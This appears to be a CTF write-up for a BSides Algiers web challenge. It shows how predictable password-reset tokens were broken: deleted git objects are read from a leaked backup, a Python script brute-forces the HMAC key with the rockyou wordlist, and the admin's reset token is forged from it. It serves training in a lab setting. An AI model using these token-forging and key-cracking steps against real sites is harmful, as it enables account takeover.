Rating: 5.0
We must use the Forgot password feature, let's check it
![forgot_password_check_1](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_4_.png)
![forgot_password_check_2](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_4_.png)
I received an email with a token to reset my password.
I tried doing it again and again.
And guess what? it's the same token every time
![token_email](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_5.png)
So, it must be some kind of a hash of my email, with a constant salt.
We already know the email of the admin ([email protected]), so we just need to find how it is hashed to get the token and
reset his password.
In the home page, there is a link to the [repo](https://github.com/spiders-web/spidersweb) of the challenge. it contains a file `backup.zip` let's extract it
```bash
th3jackers$ unzip backup.zip
Archive: backup.zip
inflating: README.md
creating: static/
creating: static/css/
inflating: static/css/foundation.min.css
inflating: static/css/normalize.css
inflating: static/css/main.css
inflating: static/favicon.ico
creating: static/avatars/
inflating: static/avatars/porkey.jpg
inflating: static/avatars/admin.png
inflating: static/avatars/default-avatar.png
inflating: static/avatars/deadpool.jpg
inflating: static/avatars/peterB.png
inflating: static/avatars/peni.jpg
inflating: static/avatars/miles.jpg
inflating: static/avatars/kingpin.jpg
extracting: static/avatars/gwen.png
creating: views/
inflating: views/index.erb
inflating: views/page_visitor.erb
inflating: views/page_user.erb
extracting: views/not_found.erb
creating: .git/
creating: .git/branches/
creating: .git/hooks/
......
```
There is a `.git` folder, how cool is that :3
And it contains git objects, we can use them to read
old deleted files, using the command `git cat-file OBJECT`
I used this inline command to go through all objects and read them
(Thanks to [this writeup](https://www.mrt-prodz.com/blog/view/2014/09/no-con-name-ctf-quals-2014---miscall-100pts-writeup) for the tip)
```bash
for d in *; do for f in $d/*; do git cat-file -p $d$(basename "$f"); done; done
```
Reading through all the files, i finally found what i was looking for:
```ruby
token = OpenSSL::HMAC.hexdigest("SHA256", ENV["SECRET_KEY"], email)
```
I also found this note:
```
- change SECRET_KEY to something stronger
```
So all what is left to do, it to bruteforce the key by hashing it with HMAC_SHA256 using my email and my token that i already know.
I used `rockyou` as wordlist, here is my python script:
```python
import hashlib,hmac
mytoken="MY_TOKEN"
with open("/usr/share/wordlists/rockyou.txt","rb") as f:
liste = f.readlines()
n=len(liste)
for i in range(len(liste)):
line=liste[i].strip()
if hmac.new(line,"MY_EMAIL",digestmod=hashlib.sha256).hexdigest() == mytoken:
print("FOUND: %s"%line)
break
print("Trying %d/%d"%(i,n))
```
Running it gives us the KEY in few seconds:
```bash
.....
.....
Trying 91398/14344391
Trying 91399/14344391
Trying 91400/14344391
Trying 91401/14344391
Trying 91402/14344391
Trying 91403/14344391
Trying 91404/14344391
FOUND: spiderpig1
````
Let's calculate admin's token now, shall we ?
```python
>>> print(hmac.new("spiderpig1","[email protected]",digestmod=hashlib.sha256).hexdigest())
c1971b6fc5eedfa40d5d96a017b9a439c05f2fe8cdc8d48481e00e0c4580db7d
```
Reset the admin password:
![reset_admin_token](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_6.png)
Et voila
![memehub_flag](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_7.png)
Flag: `shellmates{w3lc0me_2_th3_5pid3r_v3rs3}`